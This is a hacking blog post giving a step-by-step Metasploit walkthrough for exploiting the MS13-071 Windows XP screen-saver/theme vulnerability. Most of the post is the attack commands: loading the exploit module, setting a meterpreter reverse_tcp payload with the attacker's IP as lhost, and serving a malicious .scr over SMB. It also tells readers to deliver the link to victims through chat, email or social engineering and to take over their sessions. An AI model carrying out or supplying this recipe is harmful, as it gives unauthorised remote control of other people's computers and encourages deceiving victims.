Menu
 

Happy Republic Day to all Indians Proud of being Indian jai Hind!!!

So today we will look how an attacker can hack into windows xp system using a Arbitrary code execution vulnerability.We are going to use metasploit that is present on kali Linux or you can do the same with backtrack also. Technical description of the vulnerability is there exist a vulnerability on Microsoft Windows XP and Windows 2003 Operating system on handling of the Screen Saver path, in the [boot] section. An arbitrary path can be used as screen saver, including a remote SMB resource, which allows for remote code execution when a malicious .theme file is opened, and the “Screen Saver” tab is viewed.

Lets carryout the attack Practically here i have used victim machine to windows sp3 and attack to be kali Linux.
so follow it step by step
  • open terminal in kali Linux and type msfconsole.
    msfconsole on kali

  • Now type down following commands one by one

  • use exploit/windows/fileformat/ms13_071_theme

  • msf exploit (ms13_071_theme)>set payload windows/meterpreter/reverse_tcp

  • msf exploit (ms13_071_theme)>set lhost 192.168.223.133
    (IP of your Kali machine to know type ifconfig on new terminal)
  • msf exploit (ms13_071_theme)>set srvhost 192.168.223.133

  • msf exploit (ms13_071_theme)>exploit

    Exploit to hack windows xp system

    once all this done you need to give to your victim \\192.168.1.3:gCzJXDKtJugDsVFC.scr via chat or email or any social engineering technique you can use.once the victim open the url provided by you he will asked for confirmation of opening link .
    as soon as victim click run you will have your meterpreter shell open .
    Confirmation for un
    Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID
    Hacked into Windows XP system
    Enjoy Hacking Be safe and keep learning .


  • Post a Comment

    Feel Free To Ask Your Query we Love To Answer

     
    Top